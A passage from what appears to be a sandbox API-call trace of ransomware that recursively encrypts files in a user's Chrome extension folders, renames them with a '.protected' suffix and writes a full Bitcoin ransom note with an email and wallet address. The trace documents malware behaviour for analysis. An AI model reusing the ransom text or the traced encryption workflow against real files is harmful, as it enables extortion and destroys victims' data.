data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\messages.json.protected")) returned 1 [0080.967] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.967] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.967] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\RESTORE_FILES.txt") returned 163 [0080.967] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.967] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.967] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.968] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.968] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.968] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.968] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.968] CloseHandle (hObject=0x164) returned 1 [0080.969] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.969] lstrcmpiW (lpString1="el", lpString2="Windows") returned -1 [0080.969] lstrcmpiW (lpString1="el", lpString2="Program Files") returned -1 [0080.969] lstrcmpiW (lpString1="el", lpString2="Program Files (x86)") returned -1 [0080.969] lstrcmpiW (lpString1="el", lpString2="$Recycle.bin") returned 1 [0080.969] lstrcmpiW (lpString1="el", lpString2="System Volume Information") returned -1 [0080.969] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el") returned 145 [0080.969] lstrcmpW (lpString1="el", lpString2=".") returned 1 [0080.969] lstrcmpW (lpString1="el", lpString2="..") returned 1 [0080.969] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\*") returned 147 [0080.969] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.969] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.969] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.969] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.969] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.969] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.969] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\.") returned 147 [0080.969] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.969] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.969] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.969] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.969] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.969] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.969] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.969] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\..") returned 148 [0080.969] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.970] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.970] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.970] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.970] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.970] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.970] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.970] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.970] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\messages.json") returned 159 [0080.970] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.970] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.970] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.970] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.970] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.970] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\messages.json") returned 159 [0080.970] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.970] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\messages.json") returned 159 [0080.970] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.970] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\messages.json") returned 159 [0080.970] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.971] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x36b, lpOverlapped=0x0) returned 1 [0080.981] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffc95, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.981] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x36b, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x36b, lpOverlapped=0x0) returned 1 [0080.981] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.981] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.981] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.982] CloseHandle (hObject=0x168) returned 1 [0080.982] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\messages.json.protected") returned 169 [0080.982] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\messages.json.protected")) returned 1 [0080.983] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.983] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.983] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\RESTORE_FILES.txt") returned 163 [0080.983] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.983] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.983] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.984] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.984] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.984] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.984] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.984] CloseHandle (hObject=0x164) returned 1 [0080.984] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.985] lstrcmpiW (lpString1="en", lpString2="Windows") returned -1 [0080.985] lstrcmpiW (lpString1="en", lpString2="Program Files") returned -1 [0080.985] lstrcmpiW (lpString1="en", lpString2="Program Files (x86)") returned -1 [0080.985] lstrcmpiW (lpString1="en", lpString2="$Recycle.bin") returned 1 [0080.985] lstrcmpiW (lpString1="en", lpString2="System Volume Information") returned -1 [0080.985] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en") returned 145 [0080.985] lstrcmpW (lpString1="en", lpString2=".") returned 1 [0080.985] lstrcmpW (lpString1="en", lpString2="..") returned 1 [0080.985] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\*") returned 147 [0080.985] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.985] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.985] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.985] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.985] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.985] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.985] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\.") returned 147 [0080.985] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.985] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.985] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.985] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.985] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.985] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.985] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.985] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\..") returned 148 [0080.986] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.986] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.986] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.986] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.986] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.986] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.986] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.986] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.986] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\messages.json") returned 159 [0080.986] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.986] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.986] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.986] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.986] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.987] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\messages.json") returned 159 [0080.987] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.987] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\messages.json") returned 159 [0080.987] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.987] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\messages.json") returned 159 [0080.987] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.987] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x269, lpOverlapped=0x0) returned 1 [0080.993] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffd97, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.994] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x269, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x269, lpOverlapped=0x0) returned 1 [0080.994] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.994] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.994] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.994] CloseHandle (hObject=0x168) returned 1 [0080.994] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\messages.json.protected") returned 169 [0080.994] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\messages.json.protected")) returned 1 [0080.995] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.995] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.995] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: 